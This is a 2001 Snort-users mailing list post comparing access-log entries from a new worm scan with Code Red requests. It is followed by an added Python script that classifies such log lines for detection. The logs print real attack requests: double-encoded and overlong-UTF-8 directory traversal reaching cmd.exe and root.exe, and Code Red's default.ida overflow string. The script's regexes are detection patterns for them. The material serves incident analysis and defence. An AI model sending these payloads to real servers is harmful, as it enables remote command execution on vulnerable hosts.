[Snort-users] Code Green???

Ed Kasky ed at ...3483...
Tue Sep 18 08:53:10 EDT 2001


Mine started at about 6:00 am PDT this morning.  I checked my access log as 
well and these are very different from the code red attacks:

216.112.222.12 - - [18/Sep/2001:06:26:11 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 328

216.112.222.12 - - [18/Sep/2001:06:26:12 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 326

216.112.222.12 - - [18/Sep/2001:06:26:13 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 336

216.112.222.12 - - [18/Sep/2001:06:26:14 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 336

216.112.222.12 - - [18/Sep/2001:06:26:16 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 350

216.112.222.12 - - [18/Sep/2001:06:26:17 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 367

216.112.222.12 - - [18/Sep/2001:06:26:18 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 367

216.112.222.12 - - [18/Sep/2001:06:26:19 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 383

216.112.222.12 - - [18/Sep/2001:06:26:23 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349

216.112.222.12 - - [18/Sep/2001:06:26:25 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349

216.112.222.12 - - [18/Sep/2001:06:26:29 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349

216.112.222.12 - - [18/Sep/2001:06:26:30 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349

A code red looks like this:

149.225.56.209 - - [18/Sep/2001:03:34:28 -0700] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 500 648


At 10:16 AM 9/18/2001 -0500, Steve Halligan wrote:
>I am getting loads of this too.  I just set up a honeypot to catch it.
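As an added example (not code from the post, from Snort, or from the list members): a small Python classifier that parses Common Log Format lines like the ones above, percent-decodes the request path twice so that the %255c double-encoding and the %c0%af / %c0%2f / %c1%1c / %c1%9c overlong or malformed UTF-8 sequences are all recognised as directory traversal, and separates the cmd.exe / root.exe probes (the sequence later identified as the Nimda worm) from Code Red's default.ida request. The sample log is taken from the post with the Code Red X padding shortened, plus one constructed ordinary request from the documentation address 192.0.2.10; the category names and the function names are my own.

```python
"""Classify access-log lines into the cmd.exe scan and Code Red patterns shown in the post."""
import re
from collections import Counter
from urllib.parse import unquote_to_bytes

# Common Log Format: ip ident user [timestamp] "METHOD path PROTO" status size
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: \S+)?" (?P<status>\d{3}) (?P<size>\S+)'
)

# What the cmd.exe scan asks the server for, after decoding.
CMD_TARGETS = (b"cmd.exe", b"root.exe")

# Directory traversal after decoding: '..' then a separator then '..'. The separator
# may be a plain '/' or '\' (what %255c becomes after the second decode) or a
# two-byte sequence led by 0xC0/0xC1 (the %c0%af, %c0%2f, %c1%1c, %c1%9c forms in
# the post), which is overlong or malformed UTF-8 and never legitimate in a path.
TRAVERSAL_RE = re.compile(rb"\.\.(?:[\\/]|[\xc0\xc1].)\.\.")

# Code Red: a run of X padding in the default.ida query followed by %uXXXX escapes.
CODE_RED_RE = re.compile(r"^/default\.ida\?X{3,}.*%u[0-9a-f]{4}", re.IGNORECASE)

# Sample lines from the post (Code Red X padding shortened) plus one constructed
# ordinary request so the benign case is exercised too.
SAMPLE_LOG = """\
216.112.222.12 - - [18/Sep/2001:06:26:11 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 328
216.112.222.12 - - [18/Sep/2001:06:26:16 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 350
216.112.222.12 - - [18/Sep/2001:06:26:19 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 383
216.112.222.12 - - [18/Sep/2001:06:26:29 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349
149.225.56.209 - - [18/Sep/2001:03:34:28 -0700] "GET /default.ida?XXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801 HTTP/1.0" 500 648
192.0.2.10 - - [18/Sep/2001:07:00:00 -0700] "GET /index.html HTTP/1.0" 200 1024
"""


def decode_path(raw: str) -> bytes:
    """Percent-decode twice and keep the result as bytes.

    Two passes expose double-encoded separators (%255c -> %5c -> '\\');
    staying in bytes keeps malformed UTF-8 such as 0xC0 0xAF from being
    turned into replacement characters before it can be inspected.
    """
    return unquote_to_bytes(unquote_to_bytes(raw))


def classify(path: str) -> str:
    """Return 'code-red', 'cmd-exe-traversal', 'cmd-exe-direct' or 'other'."""
    if CODE_RED_RE.search(path):
        return "code-red"
    decoded = decode_path(path).lower()
    if any(target in decoded for target in CMD_TARGETS):
        return "cmd-exe-traversal" if TRAVERSAL_RE.search(decoded) else "cmd-exe-direct"
    return "other"


def scan_log(text: str) -> list:
    """Parse each log line and return (ip, category, status) for every scan hit."""
    hits = []
    for line in text.splitlines():
        m = CLF_RE.match(line)
        if not m:
            continue  # not CLF; skip rather than guess
        category = classify(m["path"])
        if category != "other":
            hits.append((m["ip"], category, int(m["status"])))
    return hits


def summarise(hits) -> dict:
    """Per-source counts, plus the hits the server actually served (status < 400)."""
    per_source = Counter((ip, cat) for ip, cat, _ in hits)
    served = [h for h in hits if h[2] < 400]
    return {"per_source": dict(per_source), "served": served}


if __name__ == "__main__":
    result = summarise(scan_log(SAMPLE_LOG))
    for (ip, cat), n in sorted(result["per_source"].items()):
        print(f"{ip:16} {cat:18} {n}")
    print("served (needs host examination):", result["served"])
```

Every hit in the post was answered with a 404, so the probes failed; the `served` list isolates any such request that got a 2xx or 3xx back, which is the set that calls for examining the host rather than just counting log lines.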
